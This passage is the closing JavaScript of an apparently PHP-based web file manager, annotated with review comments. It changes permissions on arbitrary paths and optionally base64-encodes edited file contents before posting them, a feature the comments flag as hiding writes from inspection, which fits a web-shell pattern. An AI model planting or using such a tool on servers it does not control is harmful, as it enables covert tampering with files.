     * get_perm appears in the visible PHP, so the response is presumably the
     * whole page, the octal test fails and the field stays empty. The request
     * is still a recognisable entry in access logs.
     *
     * @param {string} path Absolute path of the file or directory.
     */
    function showPermissionModal(path) {
        document.getElementById('perm-path').value = path;
        document.getElementById('permission-modal').classList.add('show');
        
        fetch('?get_perm=' + encodeURIComponent(path))
            .then(response => response.text())
            .then(mode => {
                // Accept only a bare 3-4 digit octal mode as the response body.
                if(mode.match(/^[0-7]{3,4}$/)) {
                    document.getElementById('perm-mode').value = mode;
                }
            });
    }
    
    function closeModal() {
        document.getElementById('permission-modal').classList.remove('show');
    }
    
    /**
     * Submit the permission dialog as a background POST to the current URL.
     *
     * The form fields (perm_path, perm_mode) are sent together with
     * change_permission=1, which is the field the server-side handler checks.
     * NOTE(review): the server answers every such request with a redirect, so
     * response.ok presumably reflects the redirected page rather than the
     * chmod() result; the outcome only shows up in the notification after reload.
     */
    function submitPermissionForm() {
        const form = document.getElementById('permission-form');
        const formData = new FormData(form);
        formData.append('change_permission', '1');
        
        fetch('', {
            method: 'POST',
            body: formData
        }).then(response => {
            if(response.ok) {
                window.location.reload();
            } else {
                alert('权限修改失败');
            }
        }).catch(error => {
            alert(' ' + error);
        });
    }
    
    // Editor submit hook (only present when the editor form was rendered).
    // When the base64 box is ticked, the textarea is replaced by the base64 of
    // its UTF-8 bytes just before the form is posted; the server decodes it
    // again when use_base64 is set. Consequence for inspection: file contents
    // written through this form can cross the network base64-encoded.
    document.getElementById('editor-form')?.addEventListener('submit', function(e) {
        const useEncoding = this.querySelector('[name="use_base64"]').checked;
        const textarea = this.querySelector('[name="file_content"]');
        
        if (useEncoding) {
            try {
                // encodeURIComponent + unescape yields a byte string that btoa() accepts.
                textarea.value = btoa(unescape(encodeURIComponent(textarea.value)));
            } catch (err) {
                // Encoding failed: report it and cancel the submission.
                alert(' ' + err);
                e.preventDefault();
            }
        }
    });
    
    // Debug leftover: logs the target of every clicked directory/file link to
    // the browser console (with an empty label). Navigation is not altered.
    document.querySelectorAll('.directory-link').forEach(link => {
        link.addEventListener('click', function(e) {
            console.log('', this.href);
        });
    });
</script>
</body>
</html>